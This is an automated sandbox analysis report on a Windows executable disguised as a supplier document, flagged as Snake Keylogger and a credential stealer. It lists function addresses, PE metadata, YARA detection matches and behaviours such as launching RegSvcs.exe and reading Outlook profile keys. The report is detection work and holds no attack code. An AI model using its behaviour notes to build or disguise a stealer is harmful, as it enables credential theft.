Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C27FA3	0_2_00C27FA3
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_018CD310	0_2_018CD310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CC146	1_2_015CC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015C7118	1_2_015C7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CA088	1_2_015CA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015C5362	1_2_015C5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CD278	1_2_015CD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CC468	1_2_015CC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CC738	1_2_015CC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015C29E0	1_2_015C29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CE988	1_2_015CE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015C69A0	1_2_015C69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CCA08	1_2_015CCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CCCD8	1_2_015CCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CCFAA	1_2_015CCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015C3E09	1_2_015C3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CE97A	1_2_015CE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_015CF961	1_2_015CF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC8FB0	1_2_05AC8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC81D0	1_2_05AC81D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC7B78	1_2_05AC7B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC15E8	1_2_05AC15E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC15F8	1_2_05AC15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE538	1_2_05ACE538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0D39	1_2_05AC0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0D48	1_2_05AC0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE548	1_2_05ACE548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC548	1_2_05ACC548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC558	1_2_05ACC558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6488	1_2_05AC6488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0489	1_2_05AC0489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0498	1_2_05AC0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACDC28	1_2_05ACDC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACBC2B	1_2_05ACBC2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACBC38	1_2_05ACBC38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACFC18	1_2_05ACFC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACDC19	1_2_05ACDC19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC3460	1_2_05AC3460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6478	1_2_05AC6478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC3450	1_2_05AC3450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACB7A8	1_2_05ACB7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC8FA1	1_2_05AC8FA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACF788	1_2_05ACF788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACD787	1_2_05ACD787
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC5780	1_2_05AC5780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACD798	1_2_05ACD798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACB798	1_2_05ACB798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC7720	1_2_05AC7720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC7710	1_2_05AC7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACF778	1_2_05ACF778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC5770	1_2_05AC5770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC2749	1_2_05AC2749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC2758	1_2_05AC2758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC1EA8	1_2_05AC1EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC1E98	1_2_05AC1E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4EC0	1_2_05AC4EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4ED0	1_2_05AC4ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4620	1_2_05AC4620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4610	1_2_05AC4610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACEE68	1_2_05ACEE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACCE67	1_2_05ACCE67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACCE78	1_2_05ACCE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6E70	1_2_05AC6E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6E72	1_2_05AC6E72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACEE57	1_2_05ACEE57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC11A0	1_2_05AC11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC1190	1_2_05AC1190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC9E8	1_2_05ACC9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE9C8	1_2_05ACE9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE9D8	1_2_05ACE9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC9D8	1_2_05ACC9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACA928	1_2_05ACA928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACA938	1_2_05ACA938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE0A7	1_2_05ACE0A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC38B8	1_2_05AC38B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACE0B8	1_2_05ACE0B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC0B7	1_2_05ACC0B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC08E0	1_2_05AC08E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC08F0	1_2_05AC08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACC0C8	1_2_05ACC0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6022	1_2_05AC6022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6030	1_2_05AC6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC3008	1_2_05AC3008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0006	1_2_05AC0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC3007	1_2_05AC3007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC0040	1_2_05AC0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC2BA0	1_2_05AC2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC2BB0	1_2_05AC2BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC5BD8	1_2_05AC5BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC5328	1_2_05AC5328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACD308	1_2_05ACD308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACB307	1_2_05ACB307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC2300	1_2_05AC2300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACB318	1_2_05ACB318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC531A	1_2_05AC531A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC7B69	1_2_05AC7B69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC72B8	1_2_05AC72B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACF2E7	1_2_05ACF2E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACF2F8	1_2_05ACF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05ACD2F7	1_2_05ACD2F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC22F0	1_2_05AC22F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC72C8	1_2_05AC72C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC6A18	1_2_05AC6A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4A68	1_2_05AC4A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC4A78	1_2_05AC4A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC1A41	1_2_05AC1A41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_05AC1A50	1_2_05AC1A50

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: String function: 00C46AC0 appears 42 times
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: String function: 00C4F8A0 appears 35 times
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: String function: 00C3EC2F appears 68 times

Source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1682235402.00000000044ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 114117914 - Rebound Electronics.exe
Source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1684155073.0000000004393000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 114117914 - Rebound Electronics.exe
Source: 114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 114117914 - Rebound Electronics.exe

Source: 114117914 - Rebound Electronics.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/4

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C6CE7A GetLastError,FormatMessageW,

0_2_00C6CE7A

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00C5AB84
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C5B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C5B134

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C6E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C6E1FD

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C66532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00C66532

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C7C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00C7C18C

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C2406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00C2406B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

File created: C:\Users\user\AppData\Local\Temp\autA7C0.tmp

Jump to behavior

Source: 114117914 - Rebound Electronics.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 114117914 - Rebound Electronics.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"	Jump to behavior

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 114117914 - Rebound Electronics.exe

Static file information: File size 1069056 > 1048576

Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 114117914 - Rebound Electronics.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 114117914 - Rebound Electronics.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1682638458.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, 114117914 - Rebound Electronics.exe, 00000000.00000003.1687466732.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 114117914 - Rebound Electronics.exe, 00000000.00000003.1682638458.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, 114117914 - Rebound Electronics.exe, 00000000.00000003.1687466732.0000000004270000.00000004.00001000.00020000.00000000.sdmp

Source: 114117914 - Rebound Electronics.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 114117914 - Rebound Electronics.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 114117914 - Rebound Electronics.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 114117914 - Rebound Electronics.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 114117914 - Rebound Electronics.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C3E01E LoadLibraryA,GetProcAddress,

0_2_00C3E01E

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4C09E push esi; ret	0_2_00C4C0A0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4C187 push edi; ret	0_2_00C4C189
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9C498 push ds; ret	0_2_00C9C4A6
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9C444 push ds; ret	0_2_00C9C452
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C8C8BC push esi; ret	0_2_00C8C8BE
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C32857 push ds; ret	0_2_00C3285A
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C32910 push ebx; ret	0_2_00C32911
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C32915 push ds; ret	0_2_00C32916
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C32919 push ds; ret	0_2_00C3291A
